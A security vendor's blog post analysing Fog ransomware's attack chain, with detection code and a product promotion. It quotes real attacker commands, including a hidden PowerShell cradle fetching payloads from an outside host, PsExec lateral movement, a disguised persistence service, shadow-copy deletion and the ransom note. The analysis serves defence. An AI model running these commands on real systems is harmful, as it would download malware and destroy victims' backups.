
Fog Ransomware 2025: Deep Dive into TTPs

Written by Sıla Özeren Hacıoğlu | Nov 24, 2025 8:06:42 AM

In May 2024, a new and dynamic threat emerged on the cybercrime landscape: Fog ransomware. In a relatively short period, this operation has distinguished itself through a rapid evolution in targeting, a sophisticated multi-pronged extortion model, and the deployment of an unusually advanced and atypical toolset. Analysis of its campaigns reveals a threat actor that is not only proficient in modern ransomware tactics but also employs techniques more commonly associated with espionage and advanced persistent threat (APT) groups.

The operational trajectory of Fog ransomware demonstrates a clear and calculated maturation. Initial campaigns were narrowly focused, primarily targeting organizations in the education and recreation sectors within the United States [1]. These sectors were likely chosen for their perceived weaker security postures and under-resourced security teams, providing a low-risk environment for the attackers to test and refine their TTPs. However, this initial phase was short-lived. The group quickly pivoted to a more opportunistic model, expanding its scope to include a wider range of industries. This escalation culminated in a successful attack against a financial institution in Asia in May 2025, a high-value and typically well-defended target [2].

At its core, Fog operates on a double-extortion model, combining the encryption of critical data with the exfiltration of sensitive information. Victims who refuse to pay the ransom are threatened with the public release of their stolen data on a dedicated TOR-based Data Leak Site (DLS).

This post analyzes FOG ransomware, detailing its multi-stage attack chain, from initial access via vulnerabilities, credentials, or phishing, to privilege escalation, lateral movement, data exfiltration, and final encryption with double extortion. We conclude with how the Picus Platform helps defend against the FOG ransomware campaign.

How Does the Fog Ransomware Multi-Stage Infection Lifecycle Work?

The Fog ransomware attack chain is a methodical, multi-stage process that demonstrates patience, sophistication, and a clear focus on maximizing impact. The lifecycle progresses from initial network access through deep network infiltration and data theft, culminating in the deployment of the ransomware payload and the final extortion demand.

Stage 1: Initial Access Vectors

Fog operators have demonstrated flexibility in gaining their initial foothold, employing several distinct vectors to breach target networks.

Vulnerability Exploitation

A primary method of entry involves the exploitation of known vulnerabilities in public-facing applications. Attacks have been observed targeting specific weaknesses in VPN appliances, most notably SonicWall SSL VPNs between August and November 2024, possibly leveraging the vulnerability tracked as CVE-2024-40766 [1].

In another campaign in October 2024, the attackers targeted a critical vulnerability (CVE-2024-40711, CVSS 9.8) in Veeam Backup & Replication (VBR) servers [2], demonstrating a strategic focus on compromising data protection infrastructure to undermine recovery efforts.

Credential Compromise

The use of compromised credentials remains a staple of the group's initial access strategy. Operators have been known to purchase credentials for corporate networks from Initial Access Brokers (IABs) or exploit weak VPN passwords obtained through other means [1].  

Phishing Campaigns

The threat actor has also evolved to incorporate email-based phishing attacks. A campaign in April 2025 utilized a malicious ZIP archive named Pay Adjustment.zip. Contained within this archive was a malicious LNK file. When a user clicks this file, it executes a command that downloads and runs a PowerShell script, stage1.ps1, from an attacker-controlled server, thereby initiating the infection chain on the endpoint. 

The command, which is given below, is designed to be stealthy, running without a visible window [3].

C:\Windows\System32\cmd.exe /c start "" /min powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/stage1.ps1' -UseBasicParsing | IEX"

The downloaded PowerShell script "stage1.ps1" conducts a multi-stage operation that fetches additional components, including a ransomware loader named cwiper.exe, a tool called ktool.exe, and further PowerShell scripts. 

Alongside these activities, it launches politically themed YouTube videos and embeds written political commentary within its code [3]:

### Ransomware Loader (cwiper.exe)
iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/cwiper.exe' -outfile $adminstartup
iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/cwiper.exe' -outfile $userstartup


### Download ktool.exe
iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/ktool.exe' -outfile $temppath


### Other PowerShell Script (lootsubmit.ps1)
iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/lootsubmit.ps1' -UseBasicParsing


### YouTube Videos and Commentary
Start-Process "powershell" -WindowStyle Hidden -ArgumentList 'Start-Process "https://youtu.be/ZAWnlZg2P38"'
Start-Process "powershell" -WindowStyle Hidden -ArgumentList 'Start-Process "https://youtu.be/7y1xJAVZxXg"'

Stage 2: Gaining a Foothold and Moving Laterally

Once an initial foothold is established, the attackers immediately work to escalate their privileges and expand their control across the network.

Discovery

The operators conduct extensive discovery to map the network and identify high-value targets. This includes performing Active Directory enumeration, potentially with tools like BloodHound, to analyze user rights and identify complex privilege escalation paths. 

In a recent attack, the open-source C2 tool GC2 was used to execute a series of discovery commands to understand the compromised system's configuration and network connectivity [2]:

whoami
net use
cmd /c "ipconfig /all"
cmd /c "netstat -anot|findstr 3389"

Privilege Escalation

A critical tool observed for privilege escalation is a utility named ktool.exe. This executable exploits a known vulnerability in the Intel Network Adapter Diagnostic Driver, iQVW64.sys, to gain SYSTEM-level privileges. The vulnerable driver is embedded within the ktool.exe binary itself and is extracted to the %TEMP% folder during execution. To trigger the exploit, the attackers provide the process ID (PID) of their target process along with a hardcoded key "fd6c57fa3852aec8" [3].

sub_1400088B0("[+] Device opened\n");
if ( argc != 2 )
{
sub_1400088B0("Invalid command. Use: %s <pid to elevate> <activation key>\n", *argv);
goto LABEL_36;
}
v7 = sub_14000CD20((__int64)argv[1], 0i64);
if ( strcmp(argv[2], "fd6c57fa3852aec8") )
{
sub_1400088B0("Wrong key\n");
goto LABEL_36;
}

Lateral Movement

To move across the network, the attackers employ a combination of legitimate system administration tools and credential theft techniques. "Living off the land" tools like PsExec and SMBExec are frequently used to execute commands and payloads on remote systems. These are often combined with techniques such as pass-the-hash and credential stuffing to leverage any credentials stolen during the discovery phase, allowing the attackers to compromise additional endpoints and servers, including domain controllers. The commands below show the usage of PsExec and SMBExec by attackers [2]:

### PsExec was used to laterally execute a suspected watchdog or launcher component associated with the GC2 backdoor.
psexec64.exe -accepteual \\192.168.8.52 -u <?,?> -p <?,?> -h -s cmd /c "CSIDL_COMMON_APPDATA\microsoft\devicesync\windowsdevicesync.exe"


### SMBExec was used to launch Syteca
cmd.exe /Q /c SytecaClient.exe 1> \\127.0.0.1\ADMIN$\__1748095766.8385904 2>&1

Stage 3: Espionage, Persistence, and Data Exfiltration

This stage of the attack reveals the group's deeper motivations, which extend beyond simple data encryption. The operational methodology observed deviates significantly from typical ransomware campaigns, exhibiting a clear emphasis on intelligence gathering and espionage prior to the final encryption stage. The attackers in one incident remained on the victim's network for approximately two weeks before deploying the ransomware [2].

Command and Control (C2)

The attackers establish a sophisticated and resilient C2 infrastructure to maintain long-term control. This has been observed to include:

  • GC2: An open-source, post-exploitation tool that uses legitimate cloud services like Google Sheets or Microsoft SharePoint as its C2 channel. By hiding its communications within legitimate web traffic to trusted domains, it becomes difficult for traditional network security tools to detect [2].
  • Adaptix C2: The beacon agent from this open-source adversarial emulation framework was found deployed on victim networks, providing the attackers with robust remote control capabilities similar to those of Cobalt Strike [2].   
  • Stowaway: This open-source proxy tool is used to create multi-hop tunnels for C2 traffic, further obfuscating the connection to the attackers' infrastructure. It was also used to deliver secondary payloads like the Syteca client [2].   
  • AnyDesk: The attackers also leverage legitimate remote access software like AnyDesk to establish direct, interactive control over compromised systems, which can expedite the attack timeline [1].

Information Stealing and Espionage

The deployment of specific tools indicates a clear intent to spy on victim activities.

  • Syteca (formerly Ekran): The use of this legitimate employee monitoring software in a ransomware attack is highly unusual and deeply concerning. Syteca is capable of recording all on-screen activity and logging keystrokes, suggesting the attackers were engaged in active surveillance to steal credentials, proprietary information, and other sensitive data directly from users' sessions. Several libraries loaded by this executable are shown below [2]:

CSIDL_SYSTEM\regsvr32.exe" /s /u [REDACTED] Files\Ekran System\Ekran System\Client\SoundCapture_7.20.576.0.dll""
CSIDL_SYSTEM\regsvr32.exe" /s /u [REDACTED] Files\Ekran System\Ekran System\Client\x86\SoundCapture_7.20.576.0.dll""
CSIDL_SYSTEM\regsvr32.exe" /s /u [REDACTED] Files\Ekran System\Ekran System\Client\CredentialProviderWrapper.dll""
CSIDL_SYSTEM\regsvr32.exe" /s /u [REDACTED] Files\Ekran System\Ekran System\Client\CredentialProviderWrapper_7.20.576.0.dll""

Also, commands resembling the removal or termination of the Syteca executable were observed, indicating an effort to erase traces of activity [2]:

CSIDL_SYSTEM\taskkill.exe /f /im "EkranClient.exe"
CSIDL_SYSTEM\taskkill.exe /f /im "EkranClientSession.exe"
CSIDL_SYSTEM\taskkill.exe /f /im "EkranController.exe"
CSIDL_SYSTEM\taskkill.exe /f /im "grpcwebproxy.exe"
CSIDL_SYSTEM\taskkill.exe /f /im "PamConnectionManager.exe"
CSIDL_SYSTEM_DRIVE\program files\ekran system\ekran system\tmp\usbdriverinstaller.exe" -u [REDACTED]
CSIDL_SYSTEM_DRIVE\program files\ekran system\ekran system\tmp\usbolddriveruninstaller.exe
psexec64.exe -accepteula \\192.168.8.52 -u <?,?> -p <?,?> -h -s cmd /c "del C:\users\public\SytecaClient.ini"
psexec64.exe -accepteula \\192.168.8.150 -u <?,?> -p <?,?> -h -s cmd /c "rm C:\users\public\SytecaClient.exe"

Custom PowerShell Scripts

Two custom PowerShell scripts, lootsubmit.ps1 and trackerjacker.ps1, were used to automate intelligence gathering on compromised hosts. Both collect extensive system and hardware details, including IP address, CPU configuration, network settings, and other identifiers, and attempt to determine physical location by querying the Wigle Wi‑Fi API.

Lootsubmit.ps1 retrieves the IPv4 gateway, finds a MAC address, performs the Wigle lookup, and exfiltrates all data to hxxps://hilarious-trifle-d9182e.netlify[.]app.

Trackerjacker.ps1 mirrors this functionality but embeds its code in Base64 and XORs it with the value 85, and it features an enhanced Get-GatewayMACs function that adds ARP-based MAC address resolution [3].
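As an added illustration (not code from the Trend Micro write-up or from Picus) of how an analyst would recover the embedded script from that two-layer encoding: the post does not say whether the Base64 layer was applied before or after the XOR, so the decoder below tries both orders and keeps the candidate that decodes to printable script text. The sample script and the two encoder functions are constructed stand-ins; only the key value 85 comes from the post.

```python
import base64
import binascii
import string

XOR_KEY = 85  # single-byte key reported for trackerjacker.ps1

# Constructed stand-in for the embedded script body; not the real payload.
SAMPLE_SCRIPT = (
    "$gw = (Get-NetRoute -DestinationPrefix '0.0.0.0/0').NextHop\n"
    "Write-Output \"gateway: $gw\"\n"
)

_PRINTABLE = set(string.printable.encode("ascii"))


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII; genuine script text scores close to 1.0."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in _PRINTABLE) / len(data)


def encode_b64_then_xor(script: str, key: int = XOR_KEY) -> bytes:
    """Assumed layer order A: base64-encode the script, then XOR the base64 text."""
    return xor_bytes(base64.b64encode(script.encode("utf-8")), key)


def encode_xor_then_b64(script: str, key: int = XOR_KEY) -> bytes:
    """Assumed layer order B: XOR the raw script, then base64-encode the result."""
    return base64.b64encode(xor_bytes(script.encode("utf-8"), key))


def decode_candidates(blob: bytes, key: int = XOR_KEY):
    """Undo both possible layer orders; return (order_label, plaintext_bytes) for each that parses."""
    candidates = []
    try:  # blob is base64 text that was XORed: XOR first, then base64-decode
        candidates.append(("base64-then-xor",
                           base64.b64decode(xor_bytes(blob, key), validate=True)))
    except (binascii.Error, ValueError):
        pass
    try:  # blob is base64 of XORed bytes: base64-decode first, then XOR
        candidates.append(("xor-then-base64",
                           xor_bytes(base64.b64decode(blob, validate=True), key)))
    except (binascii.Error, ValueError):
        pass
    return candidates


def deobfuscate(blob: bytes, key: int = XOR_KEY):
    """Pick the candidate that looks most like script text; returns (order_label, text, score)."""
    best = None
    for label, data in decode_candidates(blob, key):
        score = printable_ratio(data)
        if best is None or score > best[2]:
            best = (label, data.decode("utf-8", errors="replace"), score)
    return best


if __name__ == "__main__":
    for blob in (encode_b64_then_xor(SAMPLE_SCRIPT), encode_xor_then_b64(SAMPLE_SCRIPT)):
        label, text, score = deobfuscate(blob)
        print(f"[{label}] printable={score:.2f}\n{text}")
```

Because strict Base64 decoding rejects the control characters that a XOR over Base64 text produces, the wrong order usually fails outright; the printable-ratio score settles the rare case where both orders parse.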

Persistence

The attackers go to great lengths to ensure their access to the network is maintained. In one notable case, a new service was created to establish persistence after the ransomware had already been deployed, an unusual step that strongly suggests a desire to retain long-term access for future operations [2]. 

sc create SecurityHealthIron binPath= "CSIDL_SYSTEM\diagsvcs\runtimebroker.exe" start= auto DisplayName= "Collect performance information about an application by using command-line tools."


sc start SecurityHealthIron

Additionally, a custom "Process Watchdog" program was used to continuously monitor for the GC2 C2 agent process (C:\ProgramData\Microsoft\Windows\Models\AppxModels.exe) and relaunch it if it was ever terminated [2].
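The service above is a textbook masquerade: runtimebroker.exe is a legitimate Windows binary name, but it lives directly in System32, not in a diagsvcs subfolder, and the display name is a full sentence rather than a product name. The following added example (not from the referenced report or from Picus) scores service-install events of this shape; the expected-location baseline, the CSIDL expansions and the two extra sample services are assumptions.

```python
# CSIDL placeholders as used in the quoted telemetry, expanded to their usual paths (assumed).
CSIDL = {
    "CSIDL_SYSTEM_DRIVE": "C:",
    "CSIDL_SYSTEM": r"C:\Windows\System32",
    "CSIDL_COMMON_APPDATA": r"C:\ProgramData",
}

# Where these Windows binaries legitimately live (assumed baseline, not from the post).
EXPECTED_DIRS = {
    "runtimebroker.exe": {r"c:\windows\system32"},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "spoolsv.exe": {r"c:\windows\system32"},
}
USER_WRITABLE_PREFIXES = (r"c:\programdata", r"c:\users", r"c:\windows\temp")

# Constructed 7045-style service-install events. The first is the one quoted in the post;
# the other two are constructed (one benign Windows service, one from a user-writable path).
SAMPLE_EVENTS = [
    {"service": "SecurityHealthIron",
     "image_path": r"CSIDL_SYSTEM\diagsvcs\runtimebroker.exe",
     "display_name": "Collect performance information about an application by using command-line tools."},
    {"service": "Spooler", "image_path": r"C:\Windows\System32\spoolsv.exe", "display_name": "Print Spooler"},
    {"service": "ContosoUpdate", "image_path": r'"C:\ProgramData\Contoso\update.exe" --svc',
     "display_name": "Contoso Update"},
]


def expand_csidl(path: str) -> str:
    """Replace a leading CSIDL_* tag with its real path; longest tag first so SYSTEM_DRIVE wins over SYSTEM."""
    for tag in sorted(CSIDL, key=len, reverse=True):
        if path.startswith(tag):
            return CSIDL[tag] + path[len(tag):]
    return path


def executable_from_binpath(binpath: str) -> str:
    """Strip arguments from a service binPath, honouring a leading quoted path."""
    binpath = expand_csidl(binpath.strip())
    if binpath.startswith('"'):
        return binpath[1:].split('"', 1)[0]
    return binpath.split(" ", 1)[0]


def analyze_service(event: dict) -> list:
    """Return the reasons a service-install event looks suspicious (empty list if none)."""
    exe = executable_from_binpath(event["image_path"]).lower()
    directory, _, name = exe.rpartition("\\")
    reasons = []
    expected = EXPECTED_DIRS.get(name)
    if expected and directory not in expected:          # known binary name, wrong folder
        reasons.append("masquerading_system_binary")
    if exe.startswith(USER_WRITABLE_PREFIXES):           # service binary an attacker could drop
        reasons.append("user_writable_path")
    words = event.get("display_name", "").split()
    if len(words) >= 8 and words[-1].endswith("."):      # heuristic: a sentence, not a product name
        reasons.append("description_like_display_name")
    return reasons


def triage(events) -> dict:
    """Map service name to its list of reasons, for every event in the batch."""
    return {ev["service"]: analyze_service(ev) for ev in events}


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS).items():
        print(f"{name}: {reasons or 'ok'}")
```

The baseline of expected directories is the part worth investing in: a per-fleet inventory of where signed Windows binaries actually reside catches this class of masquerade far more reliably than a list of known-bad service names.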

Data Staging and Exfiltration

Before initiating the encryption routine, the attackers exfiltrate large volumes of sensitive data to be used in their double-extortion scheme. To avoid detection, they use legitimate and common open-source tools for this process [2]:

  • 7-zip: The popular open-source file archiver is used to compress and archive sensitive directories into single files for easier exfiltration.   
  • FreeFileSync and MegaSync: These legitimate file synchronization tools are downloaded and used to transfer the staged data archives to attacker-controlled cloud storage on the Mega platform.
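Added example, not the referenced report's or Picus's code: one way to surface such bulk transfers from proxy logs is to sum outbound bytes per source host and user towards consumer cloud-storage domains and alert above a threshold. The log format, the 100 MiB threshold and the log lines below are constructed; the two Mega domains are only an example list to be maintained per environment.

```python
from collections import defaultdict

# Constructed proxy log: timestamp src_ip user dst_host method bytes_out
SAMPLE_PROXY_LOG = """\
2025-05-20T01:12:03Z 10.10.4.21 svc_backup storage-node-1.mega.co.nz POST 52428800
2025-05-20T01:14:09Z 10.10.4.21 svc_backup storage-node-1.mega.co.nz POST 52428800
2025-05-20T01:16:44Z 10.10.4.21 svc_backup storage-node-2.mega.co.nz POST 31457280
2025-05-20T09:30:00Z 10.10.7.8 jdoe mega.nz GET 1024
2025-05-20T09:31:00Z 10.10.7.8 jdoe download.windowsupdate.com GET 2048
"""

# Example consumer cloud-storage domains (Mega's); maintain your own list.
CLOUD_STORAGE_DOMAINS = ("mega.nz", "mega.co.nz")
DEFAULT_THRESHOLD = 100 * 1024 * 1024  # 100 MiB per source host, user and domain (constructed)
UPLOAD_METHODS = ("POST", "PUT")


def match_domain(host: str, domains=CLOUD_STORAGE_DOMAINS):
    """Return the list entry that host equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return None


def parse_proxy_line(line: str) -> dict:
    """Split one constructed log line into its fields."""
    ts, src, user, host, method, nbytes = line.split()
    return {"ts": ts, "src": src, "user": user, "host": host,
            "method": method, "bytes_out": int(nbytes)}


def aggregate_uploads(log_text: str) -> dict:
    """Sum upload bytes per (src, user, matched domain); non-upload methods are ignored."""
    totals = defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_proxy_line(line)
        domain = match_domain(rec["host"])
        if domain and rec["method"].upper() in UPLOAD_METHODS:
            totals[(rec["src"], rec["user"], domain)] += rec["bytes_out"]
    return dict(totals)


def flag_bulk_uploads(log_text: str, threshold: int = DEFAULT_THRESHOLD) -> list:
    """Return (src, user, domain, total_bytes) tuples at or above the threshold."""
    return sorted(
        (src, user, domain, total)
        for (src, user, domain), total in aggregate_uploads(log_text).items()
        if total >= threshold
    )


if __name__ == "__main__":
    for src, user, domain, total in flag_bulk_uploads(SAMPLE_PROXY_LOG):
        print(f"{src} ({user}) sent {total / 2**20:.0f} MiB to {domain}")
```

A service account pushing over 100 MiB to a consumer file-sharing service at 01:00 is the pattern to look for; pairing this with a process-level signal (a 7-zip archive written shortly before, or a sync client that is not part of the approved software set) gives a much lower false-positive rate than either alone.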

Stage 4: Ransomware Deployment and Extortion

Backup Deletion

To cripple recovery efforts, the ransomware payload systematically deletes all volume shadow copies on Windows systems. This is accomplished by executing the legitimate vssadmin.exe utility with specific command-line arguments [4].   

vssadmin.exe delete shadows /all /quiet
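As an added detection example (not Picus's content or the referenced vendors' code) covering the Stage 1 phishing command, the PsExec lateral-movement command, the ktool.exe driver drop and the vssadmin deletion above: the rules below run over Sysmon-style process-creation and driver-load events. The three command lines are the ones quoted in this post; the image paths, the driver-load event, the benign control event and the rule logic itself are constructed.

```python
import re

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Driver named in the post as the one ktool.exe abuses; extend from Microsoft's vulnerable driver blocklist.
KNOWN_VULNERABLE_DRIVERS = {"iqvw64.sys"}

# Constructed, Sysmon-style events. The cmd/PowerShell, PsExec and vssadmin command lines are the
# ones quoted in the post; image paths, the DriverLoad event and the benign event are constructed.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'''C:\Windows\System32\cmd.exe /c start "" /min powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/stage1.ps1' -UseBasicParsing | IEX"'''},
    {"type": "ProcessCreate", "image": r"C:\Users\Public\psexec64.exe",
     "cmdline": r'''psexec64.exe -accepteula \\192.168.8.52 -u <?,?> -p <?,?> -h -s cmd /c "del C:\users\public\SytecaClient.ini"'''},
    {"type": "DriverLoad", "image_loaded": r"C:\Users\Public\AppData\Local\Temp\iQVW64.sys"},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_hidden_download_cradle(ev):
    """Stage 1: hidden PowerShell that fetches remote content and pipes it to IEX."""
    if ev["type"] != "ProcessCreate":
        return None
    cl = ev["cmdline"].lower()
    hidden = "-windowstyle hidden" in cl or " -w hidden" in cl
    fetch = any(t in cl for t in ("iwr ", "invoke-webrequest", "downloadstring", "net.webclient"))
    execute = "| iex" in cl or "invoke-expression" in cl
    if hidden and fetch and execute:
        return {"rule": "hidden_powershell_download_cradle", "stage": "initial access",
                "urls": URL_RE.findall(ev["cmdline"])}   # URLs to block at the proxy
    return None


def rule_psexec_system_remote_exec(ev):
    """Stage 2: PsExec launching a command as SYSTEM (-s) on a remote host."""
    if ev["type"] != "ProcessCreate" or basename(ev["image"]) not in {"psexec.exe", "psexec64.exe"}:
        return None
    toks = ev["cmdline"].split()
    target = next((t for t in toks if t.startswith("\\\\")), None)
    if target and "-s" in toks:
        return {"rule": "psexec_remote_exec_as_system", "stage": "lateral movement",
                "target": target.lstrip("\\")}
    return None


def rule_vulnerable_driver_load(ev):
    """Stage 2: a known-vulnerable driver, or any driver loaded from a Temp directory."""
    if ev["type"] != "DriverLoad":
        return None
    path = ev["image_loaded"]
    if basename(path) in KNOWN_VULNERABLE_DRIVERS or "\\temp\\" in path.lower():
        return {"rule": "vulnerable_or_temp_driver_load", "stage": "privilege escalation",
                "driver": basename(path)}
    return None


def rule_shadow_copy_deletion(ev):
    """Stage 4: vssadmin deleting shadow copies ahead of encryption."""
    if ev["type"] != "ProcessCreate":
        return None
    toks = ev["cmdline"].lower().split()
    if toks and basename(toks[0]) == "vssadmin.exe" and "delete" in toks and "shadows" in toks:
        return {"rule": "shadow_copy_deletion", "stage": "impact"}
    return None


RULES = (rule_hidden_download_cradle, rule_psexec_system_remote_exec,
         rule_vulnerable_driver_load, rule_shadow_copy_deletion)


def run_rules(events) -> list:
    """Apply every rule to every event; return the list of findings in event order."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


if __name__ == "__main__":
    for finding in run_rules(SAMPLE_EVENTS):
        print(finding)
```

The shadow-copy and driver-load rules are high-confidence on their own; the cradle and PsExec rules are better treated as correlation inputs, since administrators do occasionally use both, and the combination of all four within a short window on one host or subnet is what maps cleanly onto the lifecycle described in this post.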

Encryption

The malware employs a robust hybrid encryption scheme, using a fast symmetric algorithm like AES to encrypt the file contents and a strong asymmetric algorithm like RSA to protect the AES key. This makes decryption without the attackers' private key computationally infeasible. Once encrypted, files are appended with one of several extensions: .FOG, .Fog, or .FLOCKED [4].

Extortion

Finally, a ransom note is dropped into every directory containing encrypted files. The note is named readme.txt. It contains instructions for the victim to contact the attackers via a TOR-based victim portal to negotiate payment. 

If the victim fails to comply, the exfiltrated data is published on the group's DLS, which was first observed in July 2024. Below is the readme.txt’s content [4]: 

If you are reading this, then you have been the victim of a cyber attack. We call ourselves Fog and we take responsibility for this incident. We are the ones who encrypted your data and also copied some of it to our internal resource. The sooner you contact us, the sooner we can resolve this incident and get you back to work. To contact us you need to have Tor browser installed:

1. Follow this link: xql562evsy7njcsngacphc2erzjfecwotdkobn3m4uxu2gtqh26newid.onion

2. Enter the code: 062V5NYWBJ3QB420IXRT9KL6

3. Now we can communicate safely.

If you are decision-maker, you will get all the details when you get in touch. We are waiting for you.

In one unusual campaign, the ransom note reportedly mocked a government initiative and offered a "decrypt for free" option if the victim agreed to spread the ransomware to another computer [3]. 

How Does Picus Simulate Fog Ransomware Campaign Attacks?

We also strongly suggest simulating Fog Ransomware Campaign Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as HybridPetya, Yurei, BlackNevas, and CyberVolk, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the Fog Ransomware Campaign:

Threat ID | Threat Name                    | Attack Module
67513     | Fog Ransomware Download Threat | Network Infiltration
68459     | Fog Ransomware Email Threat    | Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Key Takeaways

  • Fog ransomware evolved rapidly from limited sector targeting to broad, high‑value global targeting, including a major financial institution.
  • It uses multiple initial access vectors, including vulnerability exploitation, credential compromise, and phishing with multi‑stage PowerShell loaders.
  • The group exhibits APT‑like behavior, performing extensive discovery, privilege escalation via a driver exploit, and lateral movement with legitimate administration tools.
  • Its operations include surveillance and intelligence gathering through tools like Syteca, GC2, Adaptix, and custom scripts that collect system and location data.
  • Persistence is maintained through custom services, watchdog programs, and multiple C2 channels leveraging legitimate cloud platforms.
  • Data exfiltration precedes encryption, using common utilities to stage and transfer large volumes of files for double extortion.
  • The ransomware stage deletes backups, encrypts data with hybrid cryptography, and pressures victims through TOR‑based negotiations and public leak threats.

References

[1] K. Baker, "What is Fog Ransomware?," CrowdStrike.com. Accessed: Oct. 31, 2025. [Online]. Available: https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/fog-ransomware/

[2] "Fog Ransomware: Unusual Toolset Used in Recent Attack." Accessed: Oct. 31, 2025. [Online]. Available: https://www.security.com/threat-intelligence/fog-ransomware-attack

[3] "FOG Ransomware Spread by Cybercriminals Claiming Ties to DOGE," Trend Micro. Accessed: Oct. 31, 2025. [Online]. Available: https://www.trendmicro.com/en_us/research/25/d/fog-ransomware-concealed-within-binary-loaders-linking-themselve.html

[4] "Fog Ransomware: In-Depth Analysis, Detection, and Mitigation," SentinelOne. Accessed: Nov. 02, 2025. [Online]. Available: https://www.sentinelone.com/anthology/fog/